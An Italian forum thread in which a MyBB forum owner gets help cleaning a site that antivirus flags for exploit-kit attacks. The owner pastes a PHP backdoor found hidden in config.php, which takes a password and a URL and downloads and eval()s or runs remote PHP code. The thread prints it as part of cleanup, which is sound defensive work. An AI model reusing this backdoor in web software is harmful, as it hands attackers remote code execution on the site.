Rimuovere virus da sito web

[Freghete]

Quando visito uno specifico sito web il Norton mi rileva un attacco che riesce a bloccare. Viene classificato come "Web Attack: Malicious Toolkit Website 9".
Ho cercato sul web un rimedio e ciò mi ha portato a scansionare il sito attraverso diversi servizi web che però non hanno rilevato alcunchè.
Ho tentato anche la strada consistente nello scaricare tutto il contenuto del forum tramite FTP e poi scansionarlo con l'antivirus del pc ma non ho trovato virus.

Oggi al primo attacco se ne è unito un altro "Web Attack:Phoenix toolkit variant Activity 4".

L'ip del computer che attacca è sempre diverso ma sempre russo così come russi sono alcuni utenti che si registrano di tanto in tanto in qualità di spammers.

Che faccio?

[beva]

evita il sito

[Freghete]

evita il sito

Non ci siamo capiti. Lo devo sistemare non evitare.

[beva]

Devi ripulire il sito web, ho capito bene?

Recentemente, sono in aumento gli attacchi sfruttano Blackhole kit. Blackhole è un exploit kit web sviluppato da hacker russi.
Si tratta di un kit molto potente con un numero di exploit recenti tra cui Java e Adobe PDF exploit. L'attaccante ha continuamente migliorato il kit offuscando algoritmi di crittografia per evitare il rilevamento.
Il trojan è costituito da un pezzo di Javascript che si automodifica , nel nome e nel contenuto, ogni volta che viene eseguito in una pagina web, pertanto: è praticamente impossibile individuarlo utilizzando i tradizionali antivirus basati sulle cosiddette "signatures" cioè le sequenze di codice identificanti un virus.
L'unico intervento possibile sembrerebbe LA RIMOZIONE MANUALE DELLO SCRIPT DAL SITO WEB.
Puoi provare utilizzando un semplice ftp: salva i file testo del sito sul pc, controllali aprendoli con notepad ed elimina i sospetti.
Potresti perdere qualche file ma dovresti riuscire a pulire.
Hai caricato anche file in pdf? Perchè in tal caso la cosa potrebbe complicarsi. Se invece non li hai caricati tu e li vedi, buttali.
Un backup del sito non l'hai?

[Freghete]

Ma devo controllare solo i file js?

Non penso sia alla mia portata riconoscere codice malevolo al loro interno.

Proveró.

Ho provato a disattivare anche qualche plugin aggiuntivo che forse potrebbe aver compromesso la sicurezza del forum e averlo reso vulnerabile ad attacchi.

Non penso che la vulnerabilità sia del browser perché ne ho provato piú di uno e neanche che i pc con i quali ho fatto le prove siano infetti.

La cosa strana é che sembra che il virus non sia rilevato sempre ad ogni accesso. Oggi per lo meno mi é capitato di accedere all'url piú volte dopo il primo episodio e di non aver avuto segnalazioni dall'antivirus.

Qualche backup ce l'ho (credo non rexentissimo). Se non risolvo tento anche questa strada.


Inviato da iPod touch utilizzando Tapatalk

[blackwolf76]

Estrai questo file allegato e caricalo sulla root del server e lo lanci da comando web. Una volta riuscii a disinfettare gbcnet con questo tool.

Inoltre controlla che nelle pagine non hai qualche immagine che rimanda a qualche altro sito poco affidabile, e nel momento in cui vai a carciare la pagina e il browser tenta di aprirla il norton la blocca.

[Freghete]

Credo di aver trovato l'infezione. Questo grazie ad un differente attacco che ha mi ha indirizzato ad una ricerca diversa. Questo vulnerabilità a quanto pare ha interessato ed interessa tutt'ora moltissimi utenti che utilizzano la piattaforma MyBB. Vengono modificati diversi file .php.
Ho trovato una modifica del file config.php che purtroppo per un corretto funzionamento si è costretti a lasciare con i permessi di scrittura 666 (ora l'ho settato a 444 anche se dal pannello di controllo mi da un warning in quanto lo vuole in scrittura - e stica!!!!).
Era stato aggiunto del codice dopo parecchie righe vuote ed è questo

Codice:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '260c2432a0eecc28ce03c10dadc078a4'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);

Ho lanciato anche un'utility dall'ACP per verificare la modifica di file della piattaforma e ne ha trovati alcuni che ho sostituito con quelli originali anche se alcune modifiche potrei averle apportate io o qualche plugin che ho installato. Devo verificare il funzionamento di tutto ora: chissà se continuano a funzionare i plugin!
Cambiata la password al database (il config.php la contiene e se lo script inviava informazioni all'hacker...).

@blackwolf76
Ora provo a dare una passata anche col tool che mi hai indicato.


Il fatto è che l'infezione veniva segnalata random e non ad ogni accesso alla/e pagina/e quindi non so se ho risolto il problema in maniera definitiva.

[blackwolf76]

L'infezione che subvinno noi all'epoca aveva infettato tutti i file .php che venivano modificati per rimandare ad un sito non autorizzato.

Il tool in oggetto ripuliva e ripristinava tutti i file che erano stati interessati dal codice.

Cmq in caso di problemi puoi cancellare tutto il contenuto del server, senza toccare il database, e poi ricarichi con file puliti.

Ovviamente se hai uno forum funzionante adesso, prima di fare ulteriori mod, fatti un backup.

[beva]

Per il Blackhole kit il controllo riguarderebbe i file js ed eventuali file pdf